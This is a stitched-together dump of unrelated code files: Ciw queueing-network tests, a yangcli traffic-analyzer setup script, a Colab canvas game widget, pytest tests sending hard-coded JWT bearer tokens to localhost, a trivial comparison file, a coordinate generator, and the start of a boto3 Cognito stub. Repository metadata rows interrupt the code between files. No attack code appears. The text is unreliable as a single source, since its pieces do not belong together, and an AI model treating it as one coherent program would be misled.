self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Deterministic', 0.7]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5, 0.2], [0.0, 0.0]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0})
N = ciw.create_network(
Arrival_distributions={'Class 0': [['Exponential', 3.0]],
'Class 1': [['Exponential', 4.0]]},
Service_distributions={'Class 0': [['Exponential', 7.0]],
'Class 1': [['Uniform', 0.4, 1.2]]},
Number_of_servers=[9],
Transition_matrices={'Class 0': [[0.5]],
'Class 1': [[0.0]]},
Queue_capacities=['Inf'],
Class_change_matrices={'Node 1': [[0.0, 1.0],
[0.2, 0.8]]}
)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 2)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].class_change_matrix, [[0.0, 1.0], [0.2, 0.8]])
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 4.0]])
self.assertEqual(N.customer_classes[1].service_distributions, [['Uniform', 0.4, 1.2]])
self.assertEqual(N.customer_classes[1].transition_matrix, [[0.0]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0, 1:0})
N = ciw.create_network(
Arrival_distributions={'Class 0': [['Exponential', 3.0]],
'Class 1': [['Exponential', 4.0]]},
Service_distributions={'Class 0': [['Exponential', 7.0]],
'Class 1': [['Uniform', 0.4, 1.2]]},
Number_of_servers=[9],
Transition_matrices={'Class 0': [[0.5]],
'Class 1': [[0.0]]},
Queue_capacities=['Inf'],
Priority_classes={'Class 0': 1,
'Class 1': 0}
)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 2)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 4.0]])
self.assertEqual(N.customer_classes[1].service_distributions, [['Uniform', 0.4, 1.2]])
self.assertEqual(N.customer_classes[1].transition_matrix, [[0.0]])
self.assertEqual(N.customer_classes[0].priority_class, 1)
self.assertEqual(N.customer_classes[1].priority_class, 0)
self.assertEqual(N.number_of_priority_classes, 2)
self.assertEqual(N.priority_class_mapping, {0:1, 1:0})
N = ciw.create_network(
Arrival_distributions=[['Exponential', 3.0],
['Exponential', 4.0],
['Exponential', 2.0]],
Service_distributions=[['Exponential', 7.0],
['Uniform', 0.4, 1.2],
['Deterministic', 5.33]],
Number_of_servers=[9, 2, 4],
Transition_matrices=[[0.5, 0.0, 0.1],
[0.2, 0.1, 0.0],
[0.0, 0.0, 0.0]],
Queue_capacities=['Inf', 'Inf', 'Inf'],
Baulking_functions=[None, None, example_baulking_function]
)
self.assertEqual(N.number_of_nodes, 3)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[1].number_of_servers, 2)
self.assertEqual(N.service_centres[1].schedule, None)
self.assertFalse(N.service_centres[1].preempt)
self.assertEqual(N.service_centres[2].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[2].number_of_servers, 4)
self.assertEqual(N.service_centres[2].schedule, None)
self.assertFalse(N.service_centres[2].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Exponential', 4.0], ['Exponential', 2.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Uniform', 0.4, 1.2], ['Deterministic', 5.33]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5, 0.0, 0.1],
[0.2, 0.1, 0.0],
[0.0, 0.0, 0.0]])
self.assertEqual(N.customer_classes[0].baulking_functions, [None, None, example_baulking_function])
self.assertEqual(N.number_of_priority_classes, 1)
def test_error_no_arrivals_servers_services(self):
with self.assertRaises(ValueError):
ciw.create_network()
with self.assertRaises(ValueError):
ciw.create_network(Arrival_distributions=[['Exponential', 0.2]])
with self.assertRaises(ValueError):
ciw.create_network(Service_distributions=[['Exponential', 0.2]])
with self.assertRaises(ValueError):
ciw.create_network(Number_of_servers=[1])
with self.assertRaises(ValueError):
ciw.create_network(Arrival_distributions=[['Exponential', 0.2]], Number_of_servers=[1])
with self.assertRaises(ValueError):
ciw.create_network(Arrival_distributions=[['Exponential', 0.2]], Service_distributions=[['Exponential', 0.2]])
with self.assertRaises(ValueError):
ciw.create_network(Service_distributions=[['Exponential', 0.2]], Number_of_servers=[1])
def test_error_extra_args(self):
params = {'Arrival_distributions': [['Exponential', 3.0]],
'Service_distributions': [['Exponential', 7.0]],
'Number_of_servers': [4],
'Something_else': 56
}
with self.assertRaises(TypeError):
ciw.create_network(**params)
def test_raise_error_wrong_batch_dist(self):
params = {'Arrival_distributions': [['Exponential', 3.0]],
'Service_distributions': [['Exponential', 7.0]],
'Number_of_servers': [4],
'Batching_distributions': [['Exponential', 1.3]]
}
with self.assertRaises(ValueError):
ciw.create_network(**params)
| 59.498258
| 169
| 0.600726
| 4,011
| 34,152
| 4.897282
| 0.036899
| 0.151963
| 0.142544
| 0.085476
| 0.897113
| 0.87563
| 0.850328
| 0.828539
| 0.789492
| 0.764954
| 0
| 0.048274
| 0.254539
| 34,152
| 573
| 170
| 59.602094
| 0.723281
| 0.000849
| 0
| 0.597303
| 0
| 0
| 0.10621
| 0.020867
| 0
| 0
| 0
| 0
| 0.489403
| 1
| 0.025048
| false
| 0
| 0.013487
| 0
| 0.052023
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95be8cced20fc7cc40282537331ac6ba733410fa
| 6,926
|
py
|
Python
|
setup-traffic-analyzers/session.testapi.py
|
vlvassilev/ecoc-demo-2018
|
3f813fdff3c2405561b32122bbe3c51c001ff81b
|
[
"BSD-3-Clause"
] | 1
|
2019-03-06T13:52:14.000Z
|
2019-03-06T13:52:14.000Z
|
setup-traffic-analyzers/session.testapi.py
|
vlvassilev/ecoc-demo-2018
|
3f813fdff3c2405561b32122bbe3c51c001ff81b
|
[
"BSD-3-Clause"
] | null | null | null |
setup-traffic-analyzers/session.testapi.py
|
vlvassilev/ecoc-demo-2018
|
3f813fdff3c2405561b32122bbe3c51c001ff81b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
import lxml
from lxml import etree
import time
import sys, os
import argparse
from collections import namedtuple
import tntapi
sys.path.append("../common")
import testsuiteapi
import yangrpc
from yangcli import yangcli
namespaces={"nc":"urn:ietf:params:xml:ns:netconf:base:1.0",
"nd":"urn:ietf:params:xml:ns:yang:ietf-network",
"if":"urn:ietf:params:xml:ns:yang:ietf-interfaces"}
def yangcli_ok_script(yconn, yangcli_script):
for line in yangcli_script.splitlines():
line=line.strip()
if not line:
continue
print("Executing: "+line)
result = yangcli(yconn, line)
ok=result.xpath('./ok')
if(len(ok)!=1):
print lxml.etree.tostring(result)
assert(0)
def step_1(network, conns, yconns, filter=filter):
#!
yangcli_script_clear='''
merge /interfaces/interface[name='ge0'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge1'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge2'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge3'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge4'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge5'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge6'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge7'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge8'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge9'] -- type='ethernetCsmacd'
remove /interfaces/interface[name='ge0']/traffic-analyzer
remove /interfaces/interface[name='ge1']/traffic-analyzer
remove /interfaces/interface[name='ge2']/traffic-analyzer
remove /interfaces/interface[name='ge3']/traffic-analyzer
remove /interfaces/interface[name='ge4']/traffic-analyzer
remove /interfaces/interface[name='ge5']/traffic-analyzer
remove /interfaces/interface[name='ge6']/traffic-analyzer
remove /interfaces/interface[name='ge7']/traffic-analyzer
remove /interfaces/interface[name='ge8']/traffic-analyzer
remove /interfaces/interface[name='ge9']/traffic-analyzer
commit
'''
yangcli_script_local='''
merge /interfaces/interface[name='ge0'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge1'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge2'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge3'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge4'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge5'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge6'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge7'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge8'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge9'] -- type='ethernetCsmacd'
replace /interfaces/interface[name='ge0']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge1']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge2']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge3']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge4']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge5']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge6']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge7']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge8']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge9']/traffic-analyzer -- direction=egress
merge /interfaces/interface[name='ge0']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge1']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge2']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge3']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge4']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge5']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge6']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge7']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge8']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge9']/traffic-analyzer/filter -- type=ethernet ether-type=1234
'''
yangcli_script_middle='''
merge /interfaces/interface[name='ge0'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge1'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge2'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge3'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge4'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge5'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge6'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge7'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge8'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge9'] -- type='ethernetCsmacd'
replace /interfaces/interface[name='ge0']/traffic-analyzer
replace /interfaces/interface[name='ge1']/traffic-analyzer
replace /interfaces/interface[name='ge2']/traffic-analyzer
replace /interfaces/interface[name='ge3']/traffic-analyzer
replace /interfaces/interface[name='ge4']/traffic-analyzer
replace /interfaces/interface[name='ge5']/traffic-analyzer
replace /interfaces/interface[name='ge6']/traffic-analyzer
replace /interfaces/interface[name='ge7']/traffic-analyzer
replace /interfaces/interface[name='ge8']/traffic-analyzer
replace /interfaces/interface[name='ge9']/traffic-analyzer
'''
yangcli_ok_script(yconns["local"], yangcli_script_clear)
yangcli_ok_script(yconns["middle"], yangcli_script_clear)
tntapi.network_commit(conns)
yangcli_ok_script(yconns["local"], yangcli_script_local)
yangcli_ok_script(yconns["middle"], yangcli_script_middle)
tntapi.network_commit(conns)
def main():
print("""
#Description: Stat traffic analyzers
#Procedure:
#1 - Start traffic analyzers on the local and middle h100 ge0-9 interfaces.
""")
parser = argparse.ArgumentParser()
parser.add_argument("--config", help="Path to the netconf configuration *.xml file defining the configuration according to ietf-networks, ietf-networks-topology and netconf-node models e.g. ../networks.xml")
args = parser.parse_args()
tree=etree.parse(args.config)
network = tree.xpath('/nc:config/nd:networks/nd:network', namespaces=namespaces)[0]
conns = tntapi.network_connect(network)
yconns = tntapi.network_connect_yangrpc(network)
mylinks = tntapi.parse_network_links(network)
filter = testsuiteapi.get_filter()
print("#Running ...")
print("#1 - Start traffic analyzers on the local and middle h100 ge0-9 interfaces.")
step_1(network, conns, yconns, filter=filter)
sys.exit(main())
| 45.86755
| 208
| 0.773318
| 855
| 6,926
| 6.219883
| 0.14386
| 0.250094
| 0.302745
| 0.210605
| 0.792591
| 0.788266
| 0.691049
| 0.549267
| 0.441895
| 0.441895
| 0
| 0.020012
| 0.069304
| 6,926
| 150
| 209
| 46.173333
| 0.804995
| 0.002455
| 0
| 0.273438
| 0
| 0.085938
| 0.794556
| 0.559867
| 0
| 0
| 0
| 0
| 0.007813
| 0
| null | null | 0
| 0.078125
| null | null | 0.039063
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95d774d1708967b5e67791b7f15f139a00511e3a
| 6,091
|
py
|
Python
|
src/widgets.py
|
NishiyamatoGakuenSSHTA/nygssh-journey
|
dc8ceb7c4d33dda5d57439d8db4250d384161f83
|
[
"MIT"
] | null | null | null |
src/widgets.py
|
NishiyamatoGakuenSSHTA/nygssh-journey
|
dc8ceb7c4d33dda5d57439d8db4250d384161f83
|
[
"MIT"
] | null | null | null |
src/widgets.py
|
NishiyamatoGakuenSSHTA/nygssh-journey
|
dc8ceb7c4d33dda5d57439d8db4250d384161f83
|
[
"MIT"
] | null | null | null |
import IPython
from IPython.display import HTML
def GameDisplay():
return IPython.display.HTML('''
<button id='left-btn'>←</button>
<button id='right-btn'>→</button>
<button id='up-btn'>↑</button>
<button id='down-btn'>↓</button>
<button id='a-btn'>A</button>
<button id='b-btn'>B</button>
<div style="height: 3px"></div>
<script>
const div = document.createElement('div');
document.body.appendChild(div);
const dst_canvas = document.createElement('canvas');
dst_canvas.width = "720";
dst_canvas.height = "400";
const dst_canvasCtx = dst_canvas.getContext('2d');
div.appendChild(dst_canvas);
document.querySelector('#left-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["left"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#right-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["right"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#up-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["up"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#down-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["down"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#a-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["A"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#b-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["B"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
</script>
''')
| 40.606667
| 108
| 0.502216
| 552
| 6,091
| 5.440217
| 0.130435
| 0.107892
| 0.103896
| 0.107892
| 0.838162
| 0.838162
| 0.838162
| 0.838162
| 0.838162
| 0.838162
| 0
| 0.011285
| 0.359875
| 6,091
| 149
| 109
| 40.879195
| 0.757887
| 0
| 0
| 0.680851
| 0
| 0
| 0.982105
| 0.39074
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007092
| true
| 0
| 0.014184
| 0.007092
| 0.028369
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
253d3563f7a67ee1dd62420f9f9d214b2135ec76
| 2,382
|
py
|
Python
|
tests/test_jwt_proxy.py
|
SOFIE-project/Identity-Authentication-Authorization
|
4651fdce9249511dda4ac3591235d0670deafc9b
|
[
"Apache-1.1"
] | 2
|
2020-03-12T14:55:42.000Z
|
2020-10-16T02:54:41.000Z
|
tests/test_jwt_proxy.py
|
SOFIE-project/Identity-Authentication-Authorization
|
4651fdce9249511dda4ac3591235d0670deafc9b
|
[
"Apache-1.1"
] | 1
|
2020-08-12T19:31:33.000Z
|
2020-08-12T19:31:33.000Z
|
tests/test_jwt_proxy.py
|
SOFIE-project/Identity-Authentication-Authorization
|
4651fdce9249511dda4ac3591235d0670deafc9b
|
[
"Apache-1.1"
] | 3
|
2020-03-16T15:26:31.000Z
|
2020-05-20T20:19:49.000Z
|
import pytest
import requests
import json
class TestJWT:
def test_valid_bearer_get(self):
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6IjM2ZGNlNjBiMzg4YjA2NDUyNmI5MDJhOGRjMzIyM2NhNGMxMWFmNWYiLCJqdGkiOiIzNmRjZTYwYjM4OGIwNjQ1MjZiOTAyYThkYzMyMjNjYTRjMTFhZjVmIiwiaXNzIjoiTktHS3RjTndzc1RvUDVmN3Voc0VzNCIsImF1ZCI6InNvZmllLWlvdC5ldSIsInN1YiI6Im15ZGlkIiwiZXhwIjoxNTgxMzQyNDE4LCJpYXQiOjE1ODEzMzg4MTgsInRva2VuX3R5cGUiOiJiZWFyZXIiLCJzY29wZSI6bnVsbH0.XSyQTgTt1WByT46NJLwrlcU3BUXzWf4MDZE3M4bLAh3HwFAwD6Dhi1IVeLAxNscc0bCgS-3KgyD1fdtiiJH7WktQIc269OLNxhnaXun_LxEYrWQCRHIFb0Je8Eg6CvdOB3shrlNZHmVELe6gaU0tQJ0-cdBbuz0udq_Mou1WLEwe6vp3mfgLiuTe2pT4wVI2PldvmUujeH6IpEop1nESYVA06pK6nV08d1RW7c_sRPgJdpSGGv-QhRcxBjDowkUs9J0OaTtGlExKhMv_17P96EskyOqCHku6RyydFccYbd5tl-Wh-9MqI4Me8z3BBSKPiIvQ2mo5OMcBmI0WwXb6jw"
headers = {'Authorization':'Bearer ' + token, 'Accept': 'application/json'}
response = requests.get("http://localhost:9000/secure/jwt", headers = headers)
print(response.text)
assert(response.status_code == 200)
def test_valid_bearer_put(self):
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6IjM2ZGNlNjBiMzg4YjA2NDUyNmI5MDJhOGRjMzIyM2NhNGMxMWFmNWYiLCJqdGkiOiIzNmRjZTYwYjM4OGIwNjQ1MjZiOTAyYThkYzMyMjNjYTRjMTFhZjVmIiwiaXNzIjoiTktHS3RjTndzc1RvUDVmN3Voc0VzNCIsImF1ZCI6InNvZmllLWlvdC5ldSIsInN1YiI6Im15ZGlkIiwiZXhwIjoxNTgxMzQyNDE4LCJpYXQiOjE1ODEzMzg4MTgsInRva2VuX3R5cGUiOiJiZWFyZXIiLCJzY29wZSI6bnVsbH0.XSyQTgTt1WByT46NJLwrlcU3BUXzWf4MDZE3M4bLAh3HwFAwD6Dhi1IVeLAxNscc0bCgS-3KgyD1fdtiiJH7WktQIc269OLNxhnaXun_LxEYrWQCRHIFb0Je8Eg6CvdOB3shrlNZHmVELe6gaU0tQJ0-cdBbuz0udq_Mou1WLEwe6vp3mfgLiuTe2pT4wVI2PldvmUujeH6IpEop1nESYVA06pK6nV08d1RW7c_sRPgJdpSGGv-QhRcxBjDowkUs9J0OaTtGlExKhMv_17P96EskyOqCHku6RyydFccYbd5tl-Wh-9MqI4Me8z3BBSKPiIvQ2mo5OMcBmI0WwXb6jw"
headers = {'Authorization':'Bearer ' + token, 'Content-Type': 'application/json', 'Accept': 'application/json'}
data = {'on': False}
response = requests.put("http://localhost:9000/secure/jwt", headers = headers, data = json.dumps(data))
print(response.text)
assert(response.status_code == 200)
def test_valid_default_get(self):
headers = {'Accept': 'application/json'}
response = requests.get("http://localhost:9000/randomURL", headers = headers)
print(response.text)
assert(response.status_code == 200)
| 91.615385
| 709
| 0.843409
| 134
| 2,382
| 14.843284
| 0.373134
| 0.030166
| 0.0181
| 0.034691
| 0.898441
| 0.898441
| 0.898441
| 0.873806
| 0.873806
| 0.816491
| 0
| 0.091959
| 0.09152
| 2,382
| 26
| 710
| 91.615385
| 0.827172
| 0
| 0
| 0.363636
| 0
| 0
| 0.676878
| 0.579941
| 0
| 0
| 0
| 0
| 0.136364
| 1
| 0.136364
| false
| 0
| 0.136364
| 0
| 0.318182
| 0.136364
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c2d4bab5ba5e67753a37ca8915c57490bdbd4e36
| 8
|
py
|
Python
|
codemach/tests/source/comp_equal.py
|
chuck1/myexecutor
|
6b70d2e7bc9ace0efde8e38f75be2b928393bfdf
|
[
"MIT"
] | null | null | null |
codemach/tests/source/comp_equal.py
|
chuck1/myexecutor
|
6b70d2e7bc9ace0efde8e38f75be2b928393bfdf
|
[
"MIT"
] | 37
|
2017-06-29T22:42:08.000Z
|
2019-01-22T18:22:57.000Z
|
codemach/tests/source/comp_equal.py
|
chuck1/myexecutor
|
6b70d2e7bc9ace0efde8e38f75be2b928393bfdf
|
[
"MIT"
] | null | null | null |
2 == 3
| 2.666667
| 6
| 0.25
| 2
| 8
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.5
| 8
| 2
| 7
| 4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6696a49079f374ae5ff3d70f4a8b560e28a0ab8a
| 396
|
py
|
Python
|
coord_generator/__init__.py
|
DevER-M/coord_generator
|
8586620f928a10652ee65d2b6573cc04b9ca8ee0
|
[
"MIT"
] | null | null | null |
coord_generator/__init__.py
|
DevER-M/coord_generator
|
8586620f928a10652ee65d2b6573cc04b9ca8ee0
|
[
"MIT"
] | null | null | null |
coord_generator/__init__.py
|
DevER-M/coord_generator
|
8586620f928a10652ee65d2b6573cc04b9ca8ee0
|
[
"MIT"
] | null | null | null |
import random
def generate_coordinates(min_num,max_num):
for coords in range(1):
x = random.randint(min_num,max_num)
y = random.randint(min_num,max_num)
z = random.randint(min_num,max_num)
return x,y,z
def generate_XandY_coordinates(min_num,max_num,):
for coords in range(1):
x = random.randint(min_num,max_num)
y = random.randint(min_num,max_num)
return x,y
| 33
| 50
| 0.714646
| 69
| 396
| 3.855072
| 0.275362
| 0.157895
| 0.236842
| 0.315789
| 0.845865
| 0.845865
| 0.845865
| 0.845865
| 0.845865
| 0.691729
| 0
| 0.006135
| 0.176768
| 396
| 12
| 51
| 33
| 0.809816
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.083333
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6699abc0bf1069954ff90fb99ad6477dda89078c
| 387,233
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/cognito_idp/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/cognito_idp/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/cognito_idp/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def add_custom_attributes(self, UserPoolId: str, CustomAttributes: List) -> Dict:
"""
Adds additional user attributes to the user pool schema.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AddCustomAttributes>`_
**Request Syntax**
::
response = client.add_custom_attributes(
UserPoolId='string',
CustomAttributes=[
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
